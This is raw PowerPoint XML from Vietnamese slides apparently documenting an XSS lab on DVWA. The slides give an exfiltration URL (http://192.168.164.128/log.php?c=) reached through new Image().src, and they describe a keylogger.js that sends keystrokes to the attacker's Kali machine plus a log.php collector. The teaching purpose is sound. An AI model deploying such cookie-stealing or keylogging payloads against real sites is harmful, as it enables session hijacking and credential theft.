            <a:ext cx="8229600" cy="297773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OWASP (Open Web Application Security Project) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>là tổ chức phi lợi nhuận cung cấp danh sách 10 rủi ro bảo mật nghiêm trọng nhất đối với các ứng dụng web</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 Danh sách này là tài liệu nhận thức tiêu chuẩn cho các nhà phát triển để viết mã an toàn hơn.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7186083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44E89-7A34-BA06-355E-A1ABBDBD288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68CE505-127A-FD6F-A754-DE36FBACCDD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42A8769B-AC39-0C84-B351-3E1744F8936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150</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CC0D093-A272-40F3-54C3-BAA5375707EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>
            <a:ext cx="8915400" cy="1592743"/>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Tiến hành tiêm Payload (Payload Injection). Trong trường nhập liệu của XSS Reflected trên DVWA</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Nội dụng  payload như sau:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B66F749A-84A4-7727-E22E-98192D2370A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177822"/>
            <a:ext cx="8759070" cy="4432275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3792148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C359A-1386-F11C-F4C6-6B374F43289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4EED505-61A7-8A8B-8EAD-CE05D21E68C1}"/>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40B3B95-E1B4-618D-481E-CA8B66E14CC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151</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41707D08-4168-6A9F-9C12-C4D3CA94FF81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Lệnh JavaScript tạo một đối tượng hình ảnh mới trong bộ nhớ qua đoạn new Image().src. Địa chỉ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>http://192.168.164.128/log.php?c=: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>là nguồn (src) của hình ảnh được trỏ về Listener trên máy Kali</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57B78199-B181-3AD8-4DEF-6F14DB2FC900}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2129638"/>
            <a:ext cx="9058587" cy="4137574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12587912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A3EC1-DBDA-F0BC-D49D-3954E0E44E0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7FAFDE-70EC-AAD1-24B4-2194B12CEF7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8E665BDF-A832-42D4-3D5D-68A707C92D9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152</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11CC1926-FF93-33E5-AB87-29D22A73B802}"/>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Khi một người dùng khác (hoặc chính Attacker sau khi đăng nhập) </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8B32F2DC-73DC-ACD4-AE76-B556262E11B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="1190625"/>
            <a:ext cx="4486275" cy="4029075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6267465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83FB-814F-7E88-C043-181926D9137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716618A-08B2-C437-60E9-830800FC54E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20B6203-9793-3500-B821-343F00ACFF6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153</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF66457E-6C64-F9F5-627E-6B3F46DFC555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Địa chỉ Server: 192.168.164.132 đã gửi dữ liệu đến Attacker (192.168.164.128).</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Điều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chứng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>minh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nghiêm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trọng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dẫn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>việc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> compromise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>phiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>làm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>việc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28EF8BFB-FF4E-ACB3-8332-97E2BEBC3631}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="132443" y="2351294"/>
            <a:ext cx="8870689" cy="3200397"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34745604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A4CFA-08D3-7A70-0C6C-DC710C565C6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33A411F-82B9-BD25-5FD3-86EF2CC2F72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81F05B2C-8188-BF99-34F5-CF7A997818B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154</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C379A378-FE80-FB9B-BFF1-E7A5D45D2A21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1921630"/>
            <a:ext cx="8915400" cy="1592743"/>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Trên máy tấn công tiến hành tạo một web folder sử dụng dịch vụ web từ công 80 của Apache . </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1"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Trong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>folder /var/www/html/xss_demo.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79652409-3279-91BA-D852-5B8FDEF6EFF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="105584"/>
            <a:ext cx="8915400" cy="1938992"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3.2.1.2.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Cross-Site Scripting (XSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Attacker </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFB50C3C-72EF-5BFD-746C-BCA81EAC4473}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206160" y="3463426"/>
            <a:ext cx="6503079" cy="2219801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32622387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C52B-61F8-51F1-D63A-36197B7B376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257A97-DE48-8F88-DEB4-46FA725F946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9F3461FB-4E85-3CE0-4541-DD0B185B18C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155</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB7755D1-9A1C-78F5-272F-8E291E8D9F36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="266700"/>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Tạo một đoạn mã độc javascript tên keylogger.js trong folder. Mã này cho phép lắng nghe các sự kiện từ bàn phím và gửi dữ liệu định kỳ về máy Attacker sau mỗi 1 s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D41F2EB8-B43F-139F-09BA-E003726AF088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1961832" y="1708244"/>
            <a:ext cx="5220335" cy="4039870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39034209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02C87-4B82-A257-9737-09B27F05544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6992672-056D-DC81-544E-95B4E3FCD73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306736A5-7D0A-3C2E-0590-52D80878DDE5}"/>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156</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F37F33EF-FBAD-2567-9907-5F77E46D563D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="266700"/>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Tạo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>một file log.php để trình duyệt ghi nhận thông tin người dùng về file log.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50F3B794-BDA7-0E64-2494-A2863DF358A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="-1" b="80555"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="236108" y="1714500"/>
            <a:ext cx="8671783" cy="12808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05093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C6E8B-20D9-45D4-EA7B-1C4CDEB4175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779BEEF-C195-B989-0819-6D562C31155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39E9BAD3-F4B5-8923-D75B-2AE2BBF1504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157</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2840571B-5F89-419F-B617-007F2DD67EB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11430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Nội dung file log.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77D7238E-D8FC-062A-6BE3-C6465D1FEBF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628616" y="970265"/>
            <a:ext cx="5886768" cy="4605012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15638374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9BDA-DE44-CEED-34B7-D8ACC760A7F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5D95178-0E93-D612-C88F-A2545CC6CA0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0750EF30-850B-16FC-D323-9D572A4C7A1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158</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA749AEA-E768-0C05-B6F5-C54A75A3BA53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11430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Cấp quyền cho file log.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92502169-2082-82F0-A4DA-4EF2F18D4EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="1555396"/>
            <a:ext cx="7543800" cy="2604207"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1830647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B648-6303-16ED-747A-789C846DACE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2E367AF-EAA2-2A73-19D1-4F9605BD39C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917266AC-5363-CED3-83AD-9853327D085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159</a:t>
            </a:fld>
